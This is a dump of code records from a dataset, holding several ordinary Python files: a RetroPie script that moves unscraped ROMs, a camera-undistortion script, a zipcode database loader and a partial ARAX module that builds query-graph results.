144, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 272, "usage_type": "name"}, {"api_name": "numpy.random.shuffle", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 285, "usage_type": "call"}]} +{"seq_id": "164672651", "text": "#!/usr/bin/env python3\nfrom os import path, listdir, makedirs\nfrom locale import setlocale, LC_ALL\nfrom dialog import Dialog as dialog\nfrom sys import exit\nfrom xml.etree import ElementTree as xml\nfrom pathlib import Path\nfrom shutil import move\n\n#####\n\nROM_PATH = \"Downloads/Roms/roms\" # RetroPie/roms\nUNSCRAPED_PATH = \"Downloads/Roms/roms/unscraped\"\n\n#####\n\nhome = str(Path.home())\nrompath = path.join(home, ROM_PATH)\nunscrapedpath = path.join(home, UNSCRAPED_PATH)\n\nsetlocale(LC_ALL, '')\n\n# Set up 'dialog'\nd = dialog(autowidgetsize=True)\nd.set_background_title(\"Remove Unscraped Roms\")\n\n# Make sure the rompath exists\nif not path.isdir(rompath):\n d.msgbox(\"Could not find rom path %s!\" % rompath)\n exit(1)\n\n# Show an infobox\nd.infobox(\"Searching for unscraped roms in %s...\\n\" % rompath)\n\n# List of systems to clean up\nsystems = []\n\n# Loop over all files in the rompath\nfor system in listdir(rompath):\n \n # Make sure it's a directory\n if path.isdir(path.join(rompath, system)) and path.join(rompath, system) != unscrapedpath:\n \n # Make sure there is a 'gamelist.xml' file inside\n gamelist = path.join(rompath, system, 'gamelist.xml')\n if path.exists(gamelist):\n \n # Append the system\n systems.append( (system, \"\", 1 ) )\n\n# Create checklist of all found systems\ncode, systems = d.checklist(\"Which folders should be cleaned of unscraped roms?\", choices=systems)\n\n# If cancel was pressed, quit the program\nif code == d.CANCEL:\n print(\"\\033[H\\033[J\")\n d.clear()\n exit(1)\n\n# Create a list of roms to move and a text placeholder\nmove_roms = []\nmove_text = \"\"\n\n# Show an infobox while searching\nd.infobox(\"Searching for unscraped roms of selected systems...\")\n\n# Loop over all selected systems\nfor system in systems:\n \n # Create a subfolder in the move path, if it doesn't exist\n unscraped_system_path = path.join(unscrapedpath, system)\n if not path.exists(unscraped_system_path):\n makedirs(unscraped_system_path)\n \n # Count total games (only files, subtract one for gamelist.xml which we know exists)\n total_games = len([rom for rom in listdir(path.join(rompath, system)) if path.isfile(path.join(rompath, system, rom))]) - 1\n scraped_games = []\n \n # Get paths of scraped roms from the systems 'gamelist.xml'\n for game in xml.parse(path.join(rompath, system, 'gamelist.xml')).getroot():\n scraped_games.append(game.find('path').text)\n \n # Append to the list text\n move_text += \"Games in '%s' folder: %d total, %d scraped\\n===================================================\\n\\n\" % (system, total_games, len(scraped_games))\n \n # Loop over all roms in the system path\n for rom in listdir(path.join(rompath, system)):\n \n # Build full rompath\n romfile = path.join(rompath, system, rom)\n \n # Check if the rom is a file, not in scraped games and is not the 'gamelist.xml'\n if path.isfile(romfile) and romfile not in scraped_games and rom != 'gamelist.xml':\n \n # Excception for cue/bin pairs\n if romfile.endswith('.bin') and (romfile[:-4] + \".cue\") in scraped_games :\n break\n \n # Append the rom and text\n move_text += \" - %s\\n\" % rom\n move_roms.append( ( path.join(rompath, system, rom), path.join(unscrapedpath, system, rom) ) )\n\n # Add some linebreaks\n move_text += \"\\n\\n\"\n\n# If there are no unscraped roms, we're done\nif len(move_roms) == 0 :\n d.msgbox(\"Did not find any unscraped roms across %d systems in %s!\" % (len(systems), rompath), width=60, height=6)\n print(\"\\033[H\\033[J\")\n d.clear()\n exit(0)\n \n# Ask if the roms should be moved\nif d.scrollbox(move_text, extra_button=True, ok_label=\"Move roms\", extra_label=\"Exit\") == d.OK :\n \n # Show an infobox while moving\n d.infobox(\"Moving unscraped roms...\")\n \n # Move roms to unscrapedpath\n for source, destination in move_roms:\n move(source, destination)\n \n # Done with this system\n d.msgbox(\"Moved %d unscraped roms to %s!\\n\" % (len(move_roms), unscrapedpath), width=60, height=6)\n\n# Done \nprint(\"\\033[H\\033[J\")\nd.clear()\nexit(0)", "sub_path": "delete-unscraped-roms/delete-unscraped-roms.py", "file_name": "delete-unscraped-roms.py", "file_ext": "py", "file_size_in_byte": 4050, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pathlib.Path.home", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "name"}, {"api_name": "locale.setlocale", "line_number": 21, "usage_type": "call"}, {"api_name": "locale.LC_ALL", "line_number": 21, "usage_type": "argument"}, {"api_name": "dialog.Dialog", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 73, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 76, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 80, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 80, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 111, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "303005770", "text": "\nimport numpy as np\n\nimport scipy.ndimage\nimage = scipy.ndimage.imread(\"data/task34/CalibIm1.gif\")\n\nimport numpy as np\ncx,cy = np.meshgrid(np.arange(image.shape[0]), np.arange(image.shape[1]))\n\nr = np.stack((cx,cy), axis=2).reshape((-1,2), order='F')\n\nfrom scipy import ndimage\n# ndimage.map_coordinates(a, [[0.5, 2, 3], [0.5, 1, 2]], order=1)\n\nimager = image[:,:,0]\nimageg = image[:,:,1]\nimageb = image[:,:,2]\n\nfrom task3 import *\ndistortion, intrinsicMtx, mtxs = loadCalibData(\"data/task34/Calib.txt\")\nextrinsicMatrix = mtxs[0]\n\nendhomor = np.array([ (p[0], p[1], 1.0) for p in r ])\nintrInv = np.linalg.inv(intrinsicMtx)\nnormalizedHomopoints = intrInv.dot(endhomor.transpose())\nprojectedPoints = np.array([ (hp[0] / hp[2], hp[1] / hp[2]) for hp in normalizedHomopoints.transpose() ])\ncorrectedPoints = np.array([ correctedPoint(p, distortion) for p in projectedPoints ])\nhomopoints2 = np.array([ (p[0], p[1], 1.0) for p in correctedPoints ])\npoints3 = np.array([ intrinsicMtx.dot(p) for p in homopoints2 ])\npoints4 = np.array([ (hp[0] / hp[2], hp[1] / hp[2]) for hp in points3 ])\nmappedPointsR = ndimage.map_coordinates(imager, points4.transpose(), order=3).reshape(480, 640)\nmappedPointsG = ndimage.map_coordinates(imageg, points4.transpose(), order=3).reshape(480, 640)\nmappedPointsB = ndimage.map_coordinates(imageb, points4.transpose(), order=3).reshape(480, 640)\nnewimage = np.stack((mappedPointsR, mappedPointsG, mappedPointsB), axis=-1)\nscipy.misc.imsave(\"data/task34/bar.gif\", newimage)\n\ndistortion, intrinsicMtx, mtxs = loadCalibData(\"data/task34/Calib.txt\")\npoints = loadModelPoints(\"data/task34/Model.txt\")\nhomopoints = [ (p[0], p[1], 0.0, 1.0) for p in points ]\n\n# Undistorted pictures\nsavePictureWithPoints(\"data/task34/bar.gif\", intrinsicMtx, mtxs[0], homopoints)\n", "sub_path": "lab1/tmptask3.py", "file_name": "tmptask3.py", "file_ext": "py", "file_size_in_byte": 1780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.ndimage.ndimage.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "scipy.ndimage.ndimage", "line_number": 5, "usage_type": "attribute"}, {"api_name": "scipy.ndimage", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.ndimage.map_coordinates", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 31, "usage_type": "name"}, {"api_name": "scipy.ndimage.map_coordinates", "line_number": 32, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 32, "usage_type": "name"}, {"api_name": "scipy.ndimage.map_coordinates", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.stack", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.ndimage.misc.imsave", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.ndimage.misc", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.ndimage", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "416177257", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom datetime import *\nfrom models import *\nimport db_api\nimport csv\n#######################################################################\n# Add zipcode information from CSV to DB\nNO_ETO = -1\ndef add_zipcode_infos(infile):\n ifile = open(infile,'rb') \n reader = csv.reader(ifile, delimiter=',') \n for row in reader: \n cols = row\n zipcode = cols[0] \n city = cols[1] \n state = cols[2] \n lat = float(cols[3])\n lng = float(cols[4])\n ele = float(cols[5])\n timezone = int(cols[6])\n dst = int(cols[7])\n\n m1 = float(cols[8])\n m2 = float(cols[9])\n m3 = float(cols[10])\n m4 = float(cols[11])\n m5 = float(cols[12])\n m6 = float(cols[13])\n m7 = float(cols[14])\n m8 = float(cols[15])\n m9 = float(cols[16])\n m10 = float(cols[17])\n m11 = float(cols[18])\n m12 = float(cols[19])\n\n now = datetime.now()\n z = ZipcodeInfo(zipcode=zipcode, city=city,latitude=lat, longitude=lng,elevation=ele, time_zone=timezone,dst=dst,created_at=now,updated_at=now)\n if (float(m1)!=NO_ETO):\n now = datetime.now()\n Eto(zipcode=zipcode, created_at=now, updated_at=now,\n m1=m1, m2=m2, m3=m3, m4=m4, m5=m5, m6=m6, m7=m7, m8=m8, m9=m9, m10=m10, m11=m11, m12=m12)\n\ndef add_data():\n add_zipcode_infos('data/zipcode_infos.csv')\n\ndb_api.open()\nadd_data()\ndb_api.close()\n", "sub_path": "add_data.py", "file_name": "add_data.py", "file_ext": "py", "file_size_in_byte": 1363, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "csv.reader", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "db_api.open", "line_number": 48, "usage_type": "call"}, {"api_name": "db_api.close", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "582609004", "text": "#!/usr/bin/env python3\n'''This module defines the `ARAXResultify` class whose `_resultify` method\nenumerates subgraphs of a knowledge graph (KG) that match a pattern set by a\nquery graph (QG) and sets the `results` data attribute of the `message` object\nto be a list of `Result` objects, each corresponding to one of the enumerated\nsubgraphs. The matching between the KG subgraphs and the QG can be forced to be\nsensitive to edge direction by setting `ignore_edge_direction=false` (the\ndefault is to ignore edge direction).\n\n Usage: python3 -u ARAX_resultify.py\n\n will run the built-in tests for ARAX_resultify.py. When testing, also be sure\n to run the `document_dsl_commands.py` script in the `code/ARAX/Documentation`\n directory since that script uses the `describe_me` method of this module.\n\n'''\n\nimport collections\nimport math\nimport os\nimport sys\nfrom typing import List, Dict, Set, Union, Iterable, cast, Optional\nfrom response import Response\n\n__author__ = 'Stephen Ramsey and Amy Glen'\n__copyright__ = 'Oregon State University'\n__credits__ = ['Stephen Ramsey', 'Amy Glen', 'David Koslicki', 'Eric Deutsch']\n__license__ = 'MIT'\n__version__ = '0.1.0'\n__maintainer__ = 'Amy Glen'\n__email__ = ''\n__status__ = 'Prototype'\n\n\n# is there a better way to import swagger_server? Following SO posting 16981921\nPACKAGE_PARENT = '../../UI/OpenAPI/python-flask-server'\nsys.path.append(os.path.normpath(os.path.join(os.getcwd(), PACKAGE_PARENT)))\nfrom swagger_server.models.edge import Edge\nfrom swagger_server.models.node import Node\nfrom swagger_server.models.q_edge import QEdge\nfrom swagger_server.models.q_node import QNode\nfrom swagger_server.models.query_graph import QueryGraph\nfrom swagger_server.models.knowledge_graph import KnowledgeGraph\nfrom swagger_server.models.node_binding import NodeBinding\nfrom swagger_server.models.edge_binding import EdgeBinding\nfrom swagger_server.models.biolink_entity import BiolinkEntity\nfrom swagger_server.models.result import Result\nfrom swagger_server.models.message import Message\n\n\n# define a string-parameterized BiolinkEntity class\nclass BiolinkEntityStr(BiolinkEntity):\n def __init__(self, category_label: str):\n super().__init__()\n self.category_label = category_label\n\n def __str__(self):\n return super().__str__() + \":\" + self.category_label\n\n\n# define a map between category_label and BiolinkEntity object\nBIOLINK_CATEGORY_LABELS = {'protein', 'disease', 'phenotypic_feature', 'gene', 'chemical_substance'}\nBIOLINK_ENTITY_TYPE_OBJECTS = {category_label: BiolinkEntityStr(category_label) for\n category_label in BIOLINK_CATEGORY_LABELS}\n\n\nclass ARAXResultify:\n ALLOWED_PARAMETERS = {'debug', 'ignore_edge_direction'}\n\n def __init__(self):\n self.response = None\n self.message = None\n self.parameters = None\n\n def describe_me(self):\n \"\"\"\n Little helper function for internal use that describes the actions and what they can do\n :return:\n \"\"\"\n\n brief_description = \"\"\" Creates a list of results from the input query graph (QG) based on the the\ninformation contained in the message knowledge graph (KG). Every subgraph\nthrough the KG that satisfies the GQ is returned. Such use cases include:\n- `resultify()` Returns all subgraphs in the knowledge graph that satisfy the\n query graph\n- `resultiy(ignore_edge_direction=false)` This mode checks edge directions in\nthe QG to ensure that matching an edge in the KG to an edge in the QG is only\nallowed if the two edges point in the same direction. The default is to not\ncheck edge direction. For example, you may want to include results that include\nrelationships like `(protein)-[involved_in]->(pathway)` even though the\nunderlying KG only contains directional edges of the form\n`(protein)<-[involved_in]-(pathway)`. Note that this command will successfully\nexecute given an arbitrary query graph and knowledge graph provided by the\nautomated reasoning system, not just ones generated by Team ARA Expander.\"\"\"\n description_list = []\n params_dict = dict()\n params_dict['brief_description'] = brief_description\n params_dict['ignore_edge_direction'] = {'''`true` or `false`. Optional; default is `true`.'''}\n # TODO: will need to update manually if more self.parameters are added\n # eg. params_dict[node_id] = {\"a query graph node ID or list of such id's (required)\"} as per issue #640\n description_list.append(params_dict)\n return description_list\n\n def apply(self, input_message: Message, input_parameters: dict) -> Response:\n\n # Define a default response\n response = Response()\n self.response = response\n self.message = input_message\n\n # Basic checks on arguments\n if not isinstance(input_parameters, dict):\n response.error(\"Provided parameters is not a dict\", error_code=\"ParametersNotDict\")\n return response\n\n # Return if any of the parameters generated an error (showing not just the first one)\n if response.status != 'OK':\n return response\n\n # Store these final parameters for convenience\n response.data['parameters'] = input_parameters\n self.parameters = input_parameters\n\n response.debug(f\"Applying Resultifier to Message with parameters {input_parameters}\")\n\n # call _resultify\n self._resultify(describe=False)\n\n # Clean up the KG (should only contain nodes used in the results)\n self._clean_up_kg()\n\n # Return the response and done\n return response\n\n def _resultify(self, describe: bool = False):\n \"\"\"From a knowledge graph and a query graph (both in a Message object), extract a list of Results objects, each containing\n lists of NodeBinding and EdgeBinding objects. Add a list of Results objects to self.message.rseults.\n\n It is required that `self.parameters` contain the following:\n ignore_edge_direction: a parameter of type `bool` indicating whether\n the direction of an edge in the knowledge graph should be taken into\n account when matching that edge to an edge in the query graph. By\n default, this parameter is `true`. Set this parameter to false in\n order to require that an edge in a subgraph of the KG will only\n match an edge in the QG if both have the same direction (taking into\n account the source/target node mapping). Optional.\n\n \"\"\"\n assert self.response is not None\n results = self.message.results\n if results is not None and len(results) > 0:\n self.response.info(f\"Clearing previous results and computing a new set of results\")\n self.message.results = []\n results = self.message.results\n self.message.n_results = 0\n\n message = self.message\n parameters = self.parameters\n\n debug_mode = parameters.get('debug', None)\n if debug_mode is not None:\n try:\n debug_mode = _parse_boolean_case_insensitive(debug_mode)\n except Exception as e:\n self.response.error(str(e))\n return\n\n for parameter_name in parameters.keys():\n if parameter_name == '':\n continue\n if parameter_name not in ARAXResultify.ALLOWED_PARAMETERS:\n error_string = \"parameter type is not allowed in ARAXResultify: \" + str(parameter_name)\n if not debug_mode:\n self.response.error(error_string)\n return\n else:\n raise ValueError(error_string)\n\n kg = message.knowledge_graph\n qg = message.query_graph\n ignore_edge_direction = parameters.get('ignore_edge_direction', None)\n if ignore_edge_direction is not None:\n try:\n ignore_edge_direction = _parse_boolean_case_insensitive(ignore_edge_direction)\n except ValueError as e:\n error_string = \"parameter value is not allowed in ARAXResultify: \" + str(ignore_edge_direction)\n if not debug_mode:\n self.response.error(error_string)\n return\n else:\n raise e\n\n try:\n results = _get_results_for_kg_by_qg(kg,\n qg,\n ignore_edge_direction)\n message_code = 'OK'\n code_description = 'Result list computed from KG and QG'\n except Exception as e:\n if not debug_mode:\n code_description = str(e)\n message_code = e.__class__.__name__\n self.response.error(code_description)\n results = []\n else:\n raise e\n\n message.results = results\n if len(results) == 0 and message_code == 'OK':\n message_code = 'WARNING'\n code_description = 'no results returned'\n if len(kg.nodes) == 0:\n code_description += '; empty knowledge graph'\n self.response.warning(code_description)\n elif message_code == 'OK':\n self.response.info(f\"Resultify created {len(results)} results\")\n\n message.n_results = len(results)\n message.code_description = code_description\n message.message_code = message_code\n\n def _clean_up_kg(self):\n self.response.debug(f\"Cleaning up the KG to remove nodes not used in the results\")\n results = self.message.results\n kg = self.message.knowledge_graph\n node_ids_used_in_results = {node_binding.kg_id for result in results for node_binding in result.node_bindings}\n cleaned_kg = KnowledgeGraph(nodes=[node for node in kg.nodes if node.id in node_ids_used_in_results],\n edges=[edge for edge in kg.edges if {edge.source_id, edge.target_id}.issubset(node_ids_used_in_results)])\n self.message.knowledge_graph = cleaned_kg\n self.response.info(f\"After cleaning, the KG contains {len(self.message.knowledge_graph.nodes)} nodes and \"\n f\"{len(self.message.knowledge_graph.edges)} edges\")\n\n\ndef _make_edge_key(node1_id: str,\n node2_id: str) -> str:\n return node1_id + '->' + node2_id\n\n\ndef _is_specific_query_node(qnode: QNode):\n return (qnode.id is not None and ':' in qnode.id) or \\\n (qnode.curie is not None and ':' in qnode.curie)\n\n\ndef _make_adj_maps(graph: Union[QueryGraph, KnowledgeGraph],\n directed=True,\n droploops=True) -> Dict[str, Dict[str, Set[str]]]:\n if directed:\n adj_map_in: Dict[str, Set[str]] = {node.id: set() for node in graph.nodes}\n adj_map_out: Dict[str, Set[str]] = {node.id: set() for node in graph.nodes}\n else:\n adj_map: Dict[str, Set[str]] = {node.id: set() for node in graph.nodes}\n try:\n for edge in graph.edges:\n if droploops and edge.target_id == edge.source_id:\n continue\n if directed:\n edge_node_id = edge.source_id\n adj_map_out[edge_node_id].add(edge.target_id)\n edge_node_id = edge.target_id\n adj_map_in[edge_node_id].add(edge.source_id)\n else:\n edge_node_id = edge.source_id\n adj_map[edge_node_id].add(edge.target_id)\n edge_node_id = edge.target_id\n adj_map[edge_node_id].add(edge.source_id)\n except KeyError:\n raise ValueError(\"Graph has an edge \" + str(edge) + \" that refers to a node ID (\" + edge_node_id + \") that is not in the graph\")\n if directed:\n ret_dict = {'in': adj_map_in, 'out': adj_map_out}\n else:\n ret_dict = {'both': adj_map}\n return ret_dict\n\n\ndef _bfs_dists(adj_map: Dict[str, Set[str]],\n start_node_id: str) -> Dict[str, Union[int, float]]:\n queue = collections.deque([start_node_id])\n distances = {node_id: math.inf for node_id in adj_map.keys()}\n distances[start_node_id] = 0\n while len(queue) > 0:\n node_id = queue.popleft()\n node_dist = distances[node_id]\n assert not math.isinf(node_dist)\n for neighb_node_id in cast(Iterable[str], adj_map[node_id]):\n if math.isinf(distances[neighb_node_id]):\n distances[neighb_node_id] = node_dist + 1\n queue.append(neighb_node_id)\n return distances\n\n\ndef _get_essence_node_for_qg(qg: QueryGraph) -> Optional[str]:\n adj_map = _make_adj_maps(qg, directed=False)['both']\n node_ids_list = list(adj_map.keys())\n all_nodes = set(node_ids_list)\n node_degrees = list(map(len, adj_map.values()))\n leaf_nodes = set(node_ids_list[i] for i, k in enumerate(node_degrees) if k == 1)\n is_set_nodes = set(node.id for node in cast(Iterable[QNode], qg.nodes) if node.is_set)\n specific_nodes = set(node.id for node in cast(Iterable[QNode], qg.nodes) if _is_specific_query_node(node))\n non_specific_nodes = all_nodes - specific_nodes\n non_specific_leaf_nodes = leaf_nodes & non_specific_nodes\n\n if len(is_set_nodes & specific_nodes) > 0:\n raise ValueError(\"the following query nodes have specific CURIE IDs but have is_set=true: \" + str(is_set_nodes & specific_nodes))\n candidate_essence_nodes = non_specific_leaf_nodes - is_set_nodes\n if len(candidate_essence_nodes) == 0:\n candidate_essence_nodes = non_specific_nodes - is_set_nodes\n if len(candidate_essence_nodes) == 0:\n return None\n elif len(candidate_essence_nodes) == 1:\n return next(iter(candidate_essence_nodes))\n else:\n specific_leaf_nodes = specific_nodes & leaf_nodes\n if len(specific_leaf_nodes) == 0:\n map_node_id_to_pos: Dict[str, Union[int, float]] = {node.id: i for i, node in enumerate(cast(Iterable[QNode], qg.nodes))}\n if len(specific_nodes) == 0:\n # return the node.id of the non-specific node with the rightmost position in the QG node list\n return sorted(candidate_essence_nodes,\n key=lambda node_id: map_node_id_to_pos[node_id],\n reverse=True)[0]\n else:\n if len(specific_nodes) == 1:\n specific_node_id = next(iter(specific_nodes))\n return sorted(candidate_essence_nodes,\n key=lambda node_id: abs(map_node_id_to_pos[node_id] -\n map_node_id_to_pos[specific_node_id]),\n reverse=True)[0]\n else:\n # there are at least two non-specific leaf nodes and at least two specific nodes\n return sorted(candidate_essence_nodes,\n key=lambda node_id: min([abs(map_node_id_to_pos[node_id] -\n map_node_id_to_pos[specific_node_id]) for\n specific_node_id in specific_nodes]),\n reverse=True)[0]\n else:\n if len(specific_leaf_nodes) == 1:\n specific_leaf_node_id = next(iter(specific_leaf_nodes))\n map_node_id_to_pos = _bfs_dists(adj_map, specific_leaf_node_id)\n else:\n all_dist_maps_for_spec_leaf_nodes = {node_id: _bfs_dists(adj_map,\n node_id) for\n node_id in specific_leaf_nodes}\n map_node_id_to_pos = {node.id: min([dist_map[node.id] for dist_map in all_dist_maps_for_spec_leaf_nodes.values()]) for\n node in cast(Iterable[QNode], qg.nodes)}\n return sorted(candidate_essence_nodes,\n key=lambda node_id: map_node_id_to_pos[node_id],\n reverse=True)[0]\n assert False\n\n\ndef _parse_boolean_case_insensitive(input_string: str) -> bool:\n if input_string is None:\n raise ValueError(\"invalid value for input_string\")\n input_string = input_string.lower()\n if input_string == 'true':\n return True\n elif input_string == 'false':\n return False\n else:\n raise ValueError(\"invalid value for input_string\")\n\n\ndef _get_results_for_kg_by_qg(kg: KnowledgeGraph, # all nodes *must* have qnode_id specified\n qg: QueryGraph,\n ignore_edge_direction: bool = True) -> List[Result]:\n\n if ignore_edge_direction is None:\n return _get_results_for_kg_by_qg(kg, qg)\n\n if len([node.id for node in cast(Iterable[QNode], qg.nodes) if node.id is None]) > 0:\n raise ValueError(\"node has None for node.id in query graph\")\n\n if len([node.id for node in cast(Iterable[Node], kg.nodes) if node.id is None]) > 0:\n raise ValueError(\"node has None for node.id in knowledge graph\")\n\n kg_node_ids_without_qnode_id = [node.id for node in cast(Iterable[Node], kg.nodes) if not node.qnode_ids]\n if len(kg_node_ids_without_qnode_id) > 0:\n raise ValueError(\"these node IDs do not have qnode_ids set: \" + str(kg_node_ids_without_qnode_id))\n\n kg_edge_ids_without_qedge_id = [edge.id for edge in cast(Iterable[Edge], kg.edges) if not edge.qedge_ids]\n if len(kg_edge_ids_without_qedge_id) > 0:\n raise ValueError(\"these edges do not have qedge_ids set: \" + str(kg_edge_ids_without_qedge_id))\n\n kg_edge_ids_by_qg_id = _get_kg_edge_ids_by_qg_id(kg)\n kg_node_ids_by_qg_id = _get_kg_node_ids_by_qg_id(kg)\n\n # build up maps of node IDs to nodes, for both the KG and QG\n kg_nodes_map = {node.id: node for node in cast(Iterable[Node], kg.nodes)}\n qg_nodes_map = {node.id: node for node in cast(Iterable[QNode], qg.nodes)}\n\n # build up maps of edge IDs to edges, for both the KG and QG\n kg_edges_map = {edge.id: edge for edge in cast(Iterable[Edge], kg.edges)}\n qg_edges_map = {edge.id: edge for edge in cast(Iterable[QEdge], qg.edges)}\n\n # --------------------- checking for validity of the NodeBindings list --------------\n # we require that every query graph node ID in the \"values\" slot of the node_bindings_map corresponds to an actual node in the QG\n qnode_ids_mapped_that_are_not_in_qg = [qnode_id for qnode_id in kg_node_ids_by_qg_id if qnode_id not in qg_nodes_map]\n if len(qnode_ids_mapped_that_are_not_in_qg) > 0:\n raise ValueError(\"A node in the KG has a qnode_id that does not exist in the QueryGraph: \" + str(qnode_ids_mapped_that_are_not_in_qg))\n\n # --------------------- checking for validity of the EdgeBindings list --------------\n # we require that every query graph edge ID in the \"values\" slot of the edge_bindings_map corresponds to an actual edge in the QG\n qedge_ids_mapped_that_are_not_in_qg = [qedge_id for qedge_id in kg_edge_ids_by_qg_id if qedge_id not in qg_edges_map]\n if len(qedge_ids_mapped_that_are_not_in_qg) > 0:\n raise ValueError(\"An edge in the KG has a qedge_id that does not exist in the QueryGraph: \" + str(qedge_ids_mapped_that_are_not_in_qg))\n\n # --------------------- checking 